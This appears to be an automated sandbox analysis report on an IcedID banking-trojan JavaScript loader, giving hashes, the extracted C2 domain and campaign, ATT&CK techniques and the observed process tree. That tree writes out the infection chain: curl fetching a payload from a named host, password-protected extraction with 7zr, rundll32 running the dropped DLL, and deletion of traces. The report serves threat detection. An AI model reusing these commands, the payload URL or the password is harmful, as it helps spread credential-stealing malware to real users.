icedid | ac99aa6b0162d71f33b1e9b286e9d0ed899ab449ac29040e494c4fb4b9b87d4d

General

Target

convert-pdf-691.js
Size

44KB
MD5

baab807d9799ba81b6cf672d75af688a
SHA1

5a6ebb01034e9ab3b719db948db259fe2fa2e84f
SHA256

ac99aa6b0162d71f33b1e9b286e9d0ed899ab449ac29040e494c4fb4b9b87d4d
SHA512

b06019d06c4945bf62ab2a8116b495d19e3fd95693550a66fa9304b3e193c04b3a4ed4e5b29123e42ab2aff4074f52d10709de5890ec1497c295dfc71e109c57
SSDEEP

384:/2eY5d0Bp7w2l/uYvxsDxb9Q5tbauRFvSefk1EK4s0QDQZWifIPguWYvLETAMg61:uTC3l2yDSef6EMveZgP8UJq58z293l

Score

10^/10

icedid 909843654 banker loader trojan

Malware Config

Extracted

Family

icedid

Campaign

909843654

C2

restohalto.site

Signatures

IcedID, BokBot
IcedID is a banking trojan capable of stealing credentials.
trojan banker icedid
Downloads MZ/PE file
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

wscript.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-4272677097-406801653-1594978504-1000\Control Panel\International\Geo\Nation wscript.exe
Executes dropped EXE 1 IoCs

Processes:

impedit.n

pid process

4552 impedit.n
Loads dropped DLL 1 IoCs

Processes:

rundll32.exe

pid process

4956 rundll32.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 10 IoCs

Processes:

rundll32.exe

pid process

4956 rundll32.exe
4956 rundll32.exe
4956 rundll32.exe
4956 rundll32.exe
4956 rundll32.exe
4956 rundll32.exe
4956 rundll32.exe
4956 rundll32.exe
3296
3296
Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

rundll32.exe

pid process

4956 rundll32.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-4272677097-406801653-1594978504-1000\Control Panel\International\Geo\Nation	wscript.exe

pid	process
4552	impedit.n

pid	process
4956	rundll32.exe

pid	process
4956	rundll32.exe
4956	rundll32.exe
4956	rundll32.exe
4956	rundll32.exe
4956	rundll32.exe
4956	rundll32.exe
4956	rundll32.exe
4956	rundll32.exe
3296
3296

pid	process
4956	rundll32.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

Processes:

impedit.nsvchost.exe

description	pid	process
Token: SeRestorePrivilege	4552	impedit.n
Token: 35	4552	impedit.n
Token: SeSecurityPrivilege	4552	impedit.n
Token: SeSecurityPrivilege	4552	impedit.n
Token: SeManageVolumePrivilege	2320	svchost.exe

Suspicious use of WriteProcessMemory 25 IoCs

Processes:

wscript.execmd.execmd.exe

description	pid	process	target process
PID 1252 wrote to memory of 4308	1252	wscript.exe	cmd.exe
PID 1252 wrote to memory of 4308	1252	wscript.exe	cmd.exe
PID 1252 wrote to memory of 4584	1252	wscript.exe	cmd.exe
PID 1252 wrote to memory of 4584	1252	wscript.exe	cmd.exe
PID 1252 wrote to memory of 4900	1252	wscript.exe	cmd.exe
PID 1252 wrote to memory of 4900	1252	wscript.exe	cmd.exe
PID 4900 wrote to memory of 1800	4900	cmd.exe	curl.exe
PID 4900 wrote to memory of 1800	4900	cmd.exe	curl.exe
PID 1252 wrote to memory of 780	1252	wscript.exe	curl.exe
PID 1252 wrote to memory of 780	1252	wscript.exe	curl.exe
PID 1252 wrote to memory of 3584	1252	wscript.exe	cmd.exe
PID 1252 wrote to memory of 3584	1252	wscript.exe	cmd.exe
PID 3584 wrote to memory of 4552	3584	cmd.exe	impedit.n
PID 3584 wrote to memory of 4552	3584	cmd.exe	impedit.n
PID 3584 wrote to memory of 4552	3584	cmd.exe	impedit.n
PID 1252 wrote to memory of 2460	1252	wscript.exe	cmd.exe
PID 1252 wrote to memory of 2460	1252	wscript.exe	cmd.exe
PID 1252 wrote to memory of 4988	1252	wscript.exe	cmd.exe
PID 1252 wrote to memory of 4988	1252	wscript.exe	cmd.exe
PID 1252 wrote to memory of 2196	1252	wscript.exe	cmd.exe
PID 1252 wrote to memory of 2196	1252	wscript.exe	cmd.exe
PID 1252 wrote to memory of 4956	1252	wscript.exe	rundll32.exe
PID 1252 wrote to memory of 4956	1252	wscript.exe	rundll32.exe
PID 1252 wrote to memory of 4684	1252	wscript.exe	cmd.exe
PID 1252 wrote to memory of 4684	1252	wscript.exe	cmd.exe

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\convert-pdf-691.js
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1252

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\convert-pdf-691.js"
2⤵
PID:4308

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c echo curl https://getdebtgo.com/wp-content/plugins/bluehost-wordpress-plugin/vendor/wpscholar/url/6006.7z --output "C:\Users\Admin\AppData\Local\Temp\voluptatum.h" --ssl-no-revoke --insecure --location > "C:\Users\Admin\AppData\Local\Temp\esse.i.bat"
2⤵
PID:4584

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\esse.i.bat"
2⤵
- Suspicious use of WriteProcessMemory
PID:4900

C:\Windows\system32\curl.exe
curl https://getdebtgo.com/wp-content/plugins/bluehost-wordpress-plugin/vendor/wpscholar/url/6006.7z --output "C:\Users\Admin\AppData\Local\Temp\voluptatum.h" --ssl-no-revoke --insecure --location
3⤵
PID:1800

C:\Windows\System32\curl.exe
"C:\Windows\System32\curl.exe" https://www.7-zip.org/a/7zr.exe --output "C:\Users\Admin\AppData\Local\Temp\impedit.n"
2⤵
PID:780

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ""C:\Users\Admin\AppData\Local\Temp\impedit.n" -pMAJbyaYNzUQneWhU@23 e -so "C:\Users\Admin\AppData\Local\Temp\voluptatum.h" > "C:\Users\Admin\AppData\Local\Temp\esse.icupiditate.v""
2⤵
- Suspicious use of WriteProcessMemory
PID:3584

C:\Users\Admin\AppData\Local\Temp\impedit.n
"C:\Users\Admin\AppData\Local\Temp\impedit.n" -pMAJbyaYNzUQneWhU@23 e -so "C:\Users\Admin\AppData\Local\Temp\voluptatum.h"
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4552

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\impedit.n"
2⤵
PID:2460

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\voluptatum.h"
2⤵
PID:4988

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Temp\esse.icupiditate.v" "esse.i"
2⤵
PID:2196

C:\Windows\System32\rundll32.exe
"C:\Windows\System32\rundll32.exe" "C:\Users\Admin\AppData\Local\Temp\esse.i", scab /k arbalet875
2⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:4956

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\esse.i.bat"
2⤵
PID:4684

C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.VCLibs.140.00_8wekyb3d8bbwe
1⤵
PID:3316

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k UnistackSvcGroup
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2320

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Comms\UnistoreDB\store.jfm

Filesize
16KB

MD5
d31e6cf7c0db7d9ee5b18a1cd0134e50

SHA1
d61fe2bb14e68e3668a8d1dfdaf3ad9308773776

SHA256
be47a952a34b60bf72d713c8d6df01d44fe114e4fae5a03edb70dfcc99125f98

SHA512
56670004abb6eedacb93d754b8b27c3be725e143ba4cea69b1cd6e93997eb6e768b55642757c544e2d05814d0352570be7c92b9f56cf28aaedfebdf78066b1c3

Download Submit
C:\Users\Admin\AppData\Local\Temp\esse.i

Filesize
302KB

MD5
1e4d739b123b53be71b9c00bf0f1996e

SHA1
133f0d4c0640e4ff4706aa63aed2325b2cf0b58d

SHA256
7a32304a7f5fa5ac24a2e33adda4da2975a1991a2f64d14368ac6edd4bfcd088

SHA512
9213f65ba379480d4b19ab3607991fb2838d3e5de93a1ae3bdaae875d4dcf2c285499145d73b1db6eb08a63d4645a3a0deec72fefbc818abfb439fca4e2ca268

Download Submit
C:\Users\Admin\AppData\Local\Temp\esse.i.bat

Filesize
199B

MD5
2f4003de23fc616ebd1ca0e3730f9313

SHA1
85fe457b0a486c254f84a61a0b1a1375018320e3

SHA256
220f6a2e691cd7f6ee1be619d45cb4ecebca6f59179ef9339a61ee2ddd40a48b

SHA512
0131d0800aeef2a395d10daa8267496655ec03e3fdbf1ec0939fd99b914855275f6081b67faecb241f22c274238219934ba1f17e19066975dda0c6e698bede0e

Download Submit
C:\Users\Admin\AppData\Local\Temp\esse.icupiditate.v

Filesize
302KB

MD5
1e4d739b123b53be71b9c00bf0f1996e

SHA1
133f0d4c0640e4ff4706aa63aed2325b2cf0b58d

SHA256
7a32304a7f5fa5ac24a2e33adda4da2975a1991a2f64d14368ac6edd4bfcd088

SHA512
9213f65ba379480d4b19ab3607991fb2838d3e5de93a1ae3bdaae875d4dcf2c285499145d73b1db6eb08a63d4645a3a0deec72fefbc818abfb439fca4e2ca268

Download Submit
C:\Users\Admin\AppData\Local\Temp\impedit.n

Filesize
571KB

MD5
58fc6de6c4e5d2fda63565d54feb9e75

SHA1
0586248c327d21efb8787e8ea9f553ddc03493ec

SHA256
72c98287b2e8f85ea7bb87834b6ce1ce7ce7f41a8c97a81b307d4d4bf900922b

SHA512
e7373a9caa023a22cc1f0f4369c2089a939ae40d26999ab5dcab2c5feb427dc9f51f96d91ef078e843301baa5d9335161a2cf015e09e678d56e615d01c8196df

Download Submit
C:\Users\Admin\AppData\Local\Temp\impedit.n

Filesize
571KB

MD5
58fc6de6c4e5d2fda63565d54feb9e75

SHA1
0586248c327d21efb8787e8ea9f553ddc03493ec

SHA256
72c98287b2e8f85ea7bb87834b6ce1ce7ce7f41a8c97a81b307d4d4bf900922b

SHA512
e7373a9caa023a22cc1f0f4369c2089a939ae40d26999ab5dcab2c5feb427dc9f51f96d91ef078e843301baa5d9335161a2cf015e09e678d56e615d01c8196df

Download Submit
C:\Users\Admin\AppData\Local\Temp\voluptatum.h

Filesize
115KB

MD5
18163eaf5a8eda69956b89ee41aa174b

SHA1
22500b20f92d6ba6f76f5a160ce5ee482144fb43

SHA256
3eb522d29cdc8e834af8b91d250ebb0f33a04cc033d42f04cc5ac90b8fc0bacb

SHA512
f2c87818244feb9c2ab3dac9529c924d7f9051cc56c56041d6a26fd6c091e411bb631d9459f4484c2fd76d37410a7acf9053e037ea3c6a04fb0fa30e21c8a336

Download Submit
memory/2320-65-0x0000021A27D90000-0x0000021A27D91000-memory.dmp

Filesize
4KB

Download
memory/2320-61-0x0000021A29170000-0x0000021A29171000-memory.dmp

Filesize
4KB

Download
memory/2320-90-0x0000021A27FE0000-0x0000021A27FE1000-memory.dmp

Filesize
4KB

Download
memory/2320-89-0x0000021A27ED0000-0x0000021A27ED1000-memory.dmp

Filesize
4KB

Download
memory/2320-22-0x0000021A1FA50000-0x0000021A1FA60000-memory.dmp

Filesize
64KB

Download
memory/2320-38-0x0000021A1FB50000-0x0000021A1FB60000-memory.dmp

Filesize
64KB

Download
memory/2320-54-0x0000021A29140000-0x0000021A29141000-memory.dmp

Filesize
4KB

Download
memory/2320-55-0x0000021A29170000-0x0000021A29171000-memory.dmp

Filesize
4KB

Download
memory/2320-56-0x0000021A29170000-0x0000021A29171000-memory.dmp

Filesize
4KB

Download
memory/2320-57-0x0000021A29170000-0x0000021A29171000-memory.dmp

Filesize
4KB

Download
memory/2320-58-0x0000021A29170000-0x0000021A29171000-memory.dmp

Filesize
4KB

Download
memory/2320-59-0x0000021A29170000-0x0000021A29171000-memory.dmp

Filesize
4KB

Download
memory/2320-60-0x0000021A29170000-0x0000021A29171000-memory.dmp

Filesize
4KB

Download
memory/2320-88-0x0000021A27ED0000-0x0000021A27ED1000-memory.dmp

Filesize
4KB

Download
memory/2320-62-0x0000021A29170000-0x0000021A29171000-memory.dmp

Filesize
4KB

Download
memory/2320-63-0x0000021A29170000-0x0000021A29171000-memory.dmp

Filesize
4KB

Download
memory/2320-64-0x0000021A29170000-0x0000021A29171000-memory.dmp

Filesize
4KB

Download
memory/2320-86-0x0000021A27EC0000-0x0000021A27EC1000-memory.dmp

Filesize
4KB

Download
memory/2320-66-0x0000021A27D80000-0x0000021A27D81000-memory.dmp

Filesize
4KB

Download
memory/2320-68-0x0000021A27D90000-0x0000021A27D91000-memory.dmp

Filesize
4KB

Download
memory/2320-71-0x0000021A27D80000-0x0000021A27D81000-memory.dmp

Filesize
4KB

Download
memory/2320-74-0x0000021A27CC0000-0x0000021A27CC1000-memory.dmp

Filesize
4KB

Download
memory/3296-12-0x00007FFE2B971000-0x00007FFE2B972000-memory.dmp

Filesize
4KB

Download
memory/3296-13-0x0000000180000000-0x0000000180009000-memory.dmp

Filesize
36KB

Download
memory/3296-21-0x00007FFE2B971000-0x00007FFE2B972000-memory.dmp

Filesize
4KB

Download
memory/3296-20-0x0000000180000000-0x0000000180009000-memory.dmp

Filesize
36KB

Download
memory/4956-11-0x000001F924680000-0x000001F924684000-memory.dmp

Filesize
16KB

Download

Analysis

Sharing